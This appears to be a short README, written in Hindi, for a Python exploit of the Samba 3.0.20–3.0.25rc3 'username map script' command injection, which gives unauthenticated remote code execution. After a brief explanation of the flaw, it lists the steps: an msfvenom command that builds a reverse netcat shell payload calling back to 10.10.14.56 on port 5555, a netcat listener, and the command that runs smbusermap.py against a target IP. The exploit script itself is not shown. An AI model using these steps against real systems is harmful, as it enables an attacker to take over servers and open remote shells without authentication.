
Samba 3.0.20-3.0.25rc3 'username map script' कमांड इंजेक्शन के लिए Python एक्सप्लॉइट, जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन और रिवर्स शेल प्रदान करता है।
यह मॉड्यूल सांबा संस्करण 3.0.20 से 3.0.25rc3 में एक कमांड निष्पादन भेद्यता का शोषण करता है, जब गैर-डिफ़ॉल्ट "username map script" कॉन्फ़िगरेशन विकल्प उपयोग में होता है। शेल मेटा वर्णों वाला उपयोगकर्ता नाम निर्दिष्ट करके, हमलावर मनमाने कमांड निष्पादित कर सकते हैं। इस भेद्यता का शोषण करने के लिए किसी प्रमाणीकरण की आवश्यकता नहीं है, क्योंकि यह विकल्प प्रमाणीकरण से पहले उपयोगकर्ता नामों को मैप करने के लिए उपयोग किया जाता है!
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
nc -nlvp 5555
python3 smbusermap.py <Target IP>
